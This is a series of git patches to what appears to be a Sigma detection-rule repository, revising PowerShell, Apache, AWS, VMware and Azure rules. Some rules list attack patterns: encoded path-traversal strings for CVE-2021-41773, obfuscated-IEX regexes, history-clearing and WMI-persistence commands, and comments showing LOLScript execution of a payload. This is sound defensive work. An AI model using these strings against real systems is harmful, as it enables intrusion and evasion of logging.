must be enable + definition: Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml index 214610d7..18f9e127 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: Module Logging must be enabledd detection: selection_id: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml index 26753203..761d66b5 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml @@ -16,7 +16,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: Module Logging must be enabledd detection: selection_4103: EventID: 4103 From 2379907f26168bfaf06ebdcd6a6111486685aefd Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 9 Oct 2021 16:42:42 +0200 Subject: [PATCH 1196/1367] docs: extended the description by a word --- .../powershell_module/powershell_alternate_powershell_hosts.yml | 2 +- .../powershell_module/powershell_bad_opsec_artifacts.yml | 2 +- .../powershell_module/powershell_clear_powershell_history.yml | 2 +- .../powershell_module/powershell_decompress_commands.yml | 2 +- .../powershell/powershell_module/powershell_get_clipboard.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_clip.yml | 2 +- .../powershell_invoke_obfuscation_obfuscated_iex.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_stdin.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_var.yml | 2 +- .../powershell_invoke_obfuscation_via_compress.yml | 2 +- .../powershell_invoke_obfuscation_via_rundll.yml | 2 +- .../powershell_invoke_obfuscation_via_stdin.yml | 2 +- .../powershell_invoke_obfuscation_via_use_clip.yml | 2 +- .../powershell_invoke_obfuscation_via_use_mhsta.yml | 2 +- .../powershell_invoke_obfuscation_via_use_rundll32.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_via_var.yml | 2 +- .../powershell/powershell_module/powershell_powercat.yml | 2 +- .../powershell_module/powershell_remote_powershell_session.yml | 2 +- .../powershell_susp_athremotefxvgpudisablementcommand.yml | 2 +- .../powershell_module/powershell_susp_zip_compress.yml | 2 +- 20 files changed, 20 insertions(+), 20 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml index 7ab2c944..0a5dc88c 100644 --- a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml index c5153e21..dc3a6cdd 100644 --- a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml +++ b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml @@ -19,7 +19,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml index 48f64acc..63ab1d2d 100644 --- a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml index d1c7e564..675257bd 100644 --- a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml @@ -17,7 +17,7 @@ references: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection2: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml index 61e99ec3..58e7ce4f 100644 --- a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml @@ -17,7 +17,7 @@ references: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection2: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml index a825ff6d..98a298b6 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml index c94e328d..fe77d74d 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_3: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml index ac820014..ff0cda53 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml index 3fb82c2e..f85198cc 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml index 9faa95df..1ba4b73e 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml index bff58af6..ccbd2b9a 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml index ef94a8c3..d5715369 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml index 6e5b5d32..3c823c36 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml index aecbcfcf..791c900b 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabledd + definition: PowerShell Module Logging must be enabledd detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml index e97a7449..3c12fe92 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml index 4273a271..2b78501f 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabledd + definition: PowerShell Module Logging must be enabledd detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_powercat.yml b/rules/windows/powershell/powershell_module/powershell_powercat.yml index 3feb349e..649381c9 100644 --- a/rules/windows/powershell/powershell_module/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_module/powershell_powercat.yml @@ -15,7 +15,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml index 39a6161c..4bd6369c 100644 --- a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml index 18f9e127..c6571b75 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabledd + definition: PowerShell Module Logging must be enabledd detection: selection_id: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml index 761d66b5..6e9268e7 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml @@ -16,7 +16,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabledd + definition: PowerShell Module Logging must be enabledd detection: selection_4103: EventID: 4103 From 195db4cffcf0ed296da4430e4b70f0a987e20574 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 9 Oct 2021 18:48:02 +0200 Subject: [PATCH 1197/1367] refactor: made Apache RCE rule more robust --- .../web_cve_2021_41773_apache_path_traversal.yml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/rules/web/web_cve_2021_41773_apache_path_traversal.yml b/rules/web/web_cve_2021_41773_apache_path_traversal.yml index 04ab1634..a28a05f8 100644 --- a/rules/web/web_cve_2021_41773_apache_path_traversal.yml +++ b/rules/web/web_cve_2021_41773_apache_path_traversal.yml @@ -11,14 +11,18 @@ references: - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/h4x0r_dz/status/1445401960371429381 - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-41773.yaml - - https://twitter.com/bl4sty/status/1445462677824761878?s=12 + - https://twitter.com/bl4sty/status/1445462677824761878 logsource: category: webserver detection: selection: c-uri|contains: - - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e' - - '/icons/.%2e/%2e%2e/%2e%2e/%2e%2e' + - '/cgi-bin/.%2e/' + - '/icons/.%2e/' + - '/cgi-bin/.%%32%65/' + - '/icons/.%%32%65/' + - '/cgi-bin/.%%%25%33' + - '/icons/.%%%25%33' selection_success: sc-status: - 200 @@ -29,5 +33,4 @@ false_positives: tags: - attack.initial_access - attack.t1190 -level: critical - +level: high From de52890a628b3cfb148c461716df341278ab4879 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 9 Oct 2021 15:24:49 -0500 Subject: [PATCH 1198/1367] Update passed_role_to_glue_development_endpoint.yml --- rules/cloud/aws/passed_role_to_glue_development_endpoint.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml index b57a5500..dfc15fc6 100644 --- a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml @@ -16,7 +16,7 @@ detection: selection2: eventSource: glue.amazonaws.com eventName: CreateDevEndpoint - condition: all + condition: selection1 and selection2 level: low tags: - attack.privilege_escalation From 1987897a7653c5f1b9dbe0c103b9255f5cd7cde5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 9 Oct 2021 15:26:38 -0500 Subject: [PATCH 1199/1367] Update aws_pass_role_to_lambda_function.yml --- rules/cloud/aws/aws_pass_role_to_lambda_function.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml index 333b6596..3c38c959 100644 --- a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml +++ b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml @@ -18,7 +18,7 @@ detection: selection3: eventSource: lambda.amazonaws.com eventName: InvokeFunction - condition: all + condition: selection1 and selection2 and selection3 level: low tags: - attack.privilege_escalation From a241f526ef6bc52c8478e7a02dd5af1596daabba Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Sun, 10 Oct 2021 07:54:40 +0545 Subject: [PATCH 1200/1367] Added more strict path --- .../sysmon_vmtoolsd_susp_child_process.yml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml b/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml index 3a7ddb28..cdecb338 100644 --- a/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml +++ b/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml @@ -8,6 +8,7 @@ tags: - attack.t1059 author: behops, Bhabesh Raj date: 2021/10/08 +modified: 2021/10/10 references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ fields: @@ -32,8 +33,8 @@ detection: - '\cscript.exe' filter: CommandLine|contains: - - 'poweron-vm-default.bat' - - 'poweroff-vm-default.bat' - - 'resume-vm-default.bat' - - 'suspend-vm-default.bat' + - '\VMware\VMware Tools\poweron-vm-default.bat' + - '\VMware\VMware Tools\poweroff-vm-default.bat' + - '\VMware\VMware Tools\resume-vm-default.bat' + - '\VMware\VMware Tools\suspend-vm-default.bat' condition: selection and not filter From 1337116d840c6076cb1f6fa69ab1457384faaec4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 10 Oct 2021 10:17:24 +0200 Subject: [PATCH 1201/1367] Cleanup selection name --- .../powershell_clear_powershell_history.yml | 8 ++++---- .../powershell_module/powershell_decompress_commands.yml | 4 ++-- .../powershell_module/powershell_get_clipboard.yml | 4 ++-- .../powershell_invoke_obfuscation_obfuscated_iex.yml | 6 +++--- .../powershell_cl_invocation_lolscript_count.yml | 4 ++-- .../powershell_cl_mutexverifiers_lolscript_count.yml | 4 ++-- .../powershell_script/powershell_detect_vm_env.yml | 2 +- .../powershell_script/powershell_wmi_persistence.yml | 2 +- 8 files changed, 17 insertions(+), 17 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml index 63ab1d2d..46da86f6 100644 --- a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml @@ -19,21 +19,21 @@ logsource: service: powershell definition: PowerShell Module Logging must be enabled detection: - selection_4: + selection_id: EventID: 4103 - selection_5: + selection_payload_1: Payload|contains: - 'del' - 'Remove-Item' - 'rm' Payload|contains|all: - '(Get-PSReadlineOption).HistorySavePath' - selection_6: + selection_payload_2: Payload|contains|all: - 'Set-PSReadlineOption' - '–HistorySaveStyle' - 'SaveNothing' - condition: selection_4 and ( selection_5 or selection_6 ) + condition: selection_id and ( selection_payload_1 or selection_payload_2 ) falsepositives: - Legitimate PowerShell scripts level: medium diff --git a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml index 675257bd..5107fd70 100644 --- a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml @@ -19,10 +19,10 @@ logsource: service: powershell definition: PowerShell Module Logging must be enabled detection: - selection2: + selection_4103: EventID: 4103 Payload|contains: 'Expand-Archive' - condition: selection2 + condition: selection_4103 falsepositives: - unknown level: informational \ No newline at end of file diff --git a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml index 58e7ce4f..832dab3d 100644 --- a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml @@ -19,10 +19,10 @@ logsource: service: powershell definition: PowerShell Module Logging must be enabled detection: - selection2: + selection_4103: EventID: 4103 Payload|contains: 'Get-Clipboard' - condition: selection2 + condition: selection_4103 falsepositives: - unknown level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml index fe77d74d..e00f05f9 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -19,9 +19,9 @@ logsource: service: powershell definition: PowerShell Module Logging must be enabled detection: - selection_3: + selection_id: EventID: 4103 - selection_4: + selection_payload: - Payload|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - Payload|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - Payload|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' @@ -29,7 +29,7 @@ detection: - Payload|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - Payload|re: '\$VerbosePreference\.ToString\(' - Payload|re: '\String\]\s*\$VerbosePreference' - condition: selection_3 and selection_4 + condition: selection_id and selection_payload falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml index 246803a0..7bce506c 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml @@ -16,12 +16,12 @@ logsource: service: powershell definition: Script block logging must be enabled detection: - selection2: + selection: EventID: 4104 ScriptBlockText|contains: - 'CL_Invocation.ps1' - 'SyncInvoke' - condition: selection2 | count(ScriptBlockText) by Computer > 2 + condition: selection | count(ScriptBlockText) by Computer > 2 # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 # PS > SyncInvoke c:\Evil.exe falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml index cc7de5f4..ac2c9ed9 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml @@ -16,12 +16,12 @@ logsource: service: powershell definition: Script block logging must be enabled detection: - selection2: + selection: EventID: 4104 ScriptBlockText|contains: - 'CL_Mutexverifiers.ps1' - 'runAfterCancelProcess' - condition: selection2 | count(ScriptBlockText) by Computer > 2 + condition: selection | count(ScriptBlockText) by Computer > 2 # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 # PS > runAfterCancelProcess c:\Evil.exe falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml b/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml index 7b810af9..250b71fe 100644 --- a/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml +++ b/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml @@ -23,7 +23,7 @@ detection: ScriptBlockText|contains: - MSAcpi_ThermalZoneTemperature - Win32_ComputerSystem - condition: all of selection_* + condition: all of them falsepositives: - Unknown level: medium diff --git a/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml index 514bf453..03fa7e18 100644 --- a/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml +++ b/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml @@ -28,7 +28,7 @@ detection: - '-Namespace root/subscription ' - '-ClassName CommandLineEventConsumer ' - '-Property ' #is a variable name - condition: all of them + condition: selection_id and selection_ioc falsepositives: - Unknown level: medium \ No newline at end of file From 5fdaefc77d9755b8ce3effa79beaad4d04275726 Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Sun, 10 Oct 2021 16:06:28 +0400 Subject: [PATCH 1202/1367] Azure Security Operations for Priveleged Accounts --- .DS_Store | Bin 0 -> 8196 bytes rules/cloud/azure/azure_account_lockout.yml | 18 ++++++++++++++ .../azure_change_to_authentication_method.yml | 19 +++++++++++++++ .../azure/azure_login_to_disabled_account.yml | 19 +++++++++++++++ rules/cloud/azure/azure_mfa_interrupted.yml | 22 ++++++++++++++++++ ...er_login_blocked_by_conditional_access.yml | 18 ++++++++++++++ 6 files changed, 96 insertions(+) create mode 100644 .DS_Store create mode 100644 rules/cloud/azure/azure_account_lockout.yml create mode 100644 rules/cloud/azure/azure_change_to_authentication_method.yml create mode 100644 rules/cloud/azure/azure_login_to_disabled_account.yml create mode 100644 rules/cloud/azure/azure_mfa_interrupted.yml create mode 100644 rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..30ea1bff625721dfd93203ca5da6e267b24ba887 GIT binary patch literal 8196 zcmeHMzl#$=6n=B&mnhuXNXivNZS=g-ZtsY#%^`@5n#++BlG~7MY_!qz4($??I%x2&04>=nVb|%ccW!`)9ee+GS%i9o<+L#a4h`L17L1(*i z3`0p{KleggvNNY)74m5`T-)4=#*;#%pYRHJ1-t@Y0k42p;D1p7&ung;is!!Z`q3-k z6{w{Ge18bg*@o68#_C%K23-QcHZZLlu2=X1Hn29dHZc|+G-Xm@O{%gbhBE1x4{Tg$ zZDOoRCuNHdWs#MwP?Sc;`hgB76&mYDuYgyer~udQ4Z1)>x=pdH-__Mu-=uFG^?LnL z)W=-s&5g$g-M!E2u7B`H|70h7H=wTTR|M@8mv(4QeTfcI%UC@ZAvv6Su=M5UuTRXO z5S1~hj*@)rJ*!Py6wxllG=&;DKEpE_$%&AB?mvxFO>*muql`~=l*{J{z^DZlW4eX2 z*`}GJ&g$N?ykBy8ai^VXRK++vR(~*$CRB-WM%y%XShV){U9aTuVfkpvLF7vY z%ibo@%H(BV7D+hncfVVF>y`NHZy!ngMMU;nE01vS_3<(V-@F2~Q{af%ahL0V z{L-u5|JP0zzhSRHofJ@w-ezwDJ609D=2|;IzlqL`;}Tof2}{S^2OW??@L literal 0 HcmV?d00001 diff --git a/rules/cloud/azure/azure_account_lockout.yml b/rules/cloud/azure/azure_account_lockout.yml new file mode 100644 index 00000000..12ac7162 --- /dev/null +++ b/rules/cloud/azure/azure_account_lockout.yml @@ -0,0 +1,18 @@ +title: Account Lockout +id: 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + service: SigninLogs +detection: + selection: + ResultType: 50053 + condition: selection +level: medium +tags: + - attack.credential_access + - attack.t1110 diff --git a/rules/cloud/azure/azure_change_to_authentication_method.yml b/rules/cloud/azure/azure_change_to_authentication_method.yml new file mode 100644 index 00000000..171932f3 --- /dev/null +++ b/rules/cloud/azure/azure_change_to_authentication_method.yml @@ -0,0 +1,19 @@ +title: Change to Authentication Method +id: 4d78a000-ab52-4564-88a5-7ab5242b20c7 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + service: AuditLogs +detection: + selection: + LoggedByService: 'Authentication Methods' + Category: 'UserManagement' + OperationName: 'User registered security info' + condition: selection +level: medium +tags: + - attack.credential_access diff --git a/rules/cloud/azure/azure_login_to_disabled_account.yml b/rules/cloud/azure/azure_login_to_disabled_account.yml new file mode 100644 index 00000000..a89c07d5 --- /dev/null +++ b/rules/cloud/azure/azure_login_to_disabled_account.yml @@ -0,0 +1,19 @@ +title: Login to Disabled Account +id: 908655e0-25cf-4ae1-b775-1c8ce9cf43d8 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Detect failed attempts to sign in to disabled accounts. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + service: SigninLogs +detection: + selection: + ResultType: 50057 + ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' + condition: selection +level: medium +tags: + - attack.initial_access + - attack.t1078 diff --git a/rules/cloud/azure/azure_mfa_interrupted.yml b/rules/cloud/azure/azure_mfa_interrupted.yml new file mode 100644 index 00000000..2f381252 --- /dev/null +++ b/rules/cloud/azure/azure_mfa_interrupted.yml @@ -0,0 +1,22 @@ +title: Multifactor Authentication Interupted +id: 5496ff55-42ec-4369-81cb-00f417029e25 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + service: SigninLogs +detection: + selection: + ResultType: 50074 + ResultDescription|contains: 'Strong Auth required' + selection1: + ResultType: 500121 + ResultDescription|contains: 'Authentication failed during strong authentication request' + condition: selection or selection1 +level: medium +tags: + - attack.initial_access + - attack.t1078.004 diff --git a/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml b/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml new file mode 100644 index 00000000..3ac01e8c --- /dev/null +++ b/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml @@ -0,0 +1,18 @@ +title: User Access Blocked by Azure Conditional Access +id: 9a60e676-26ac-44c3-814b-0c2a8b977adf +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + service: SigninLogs +detection: + 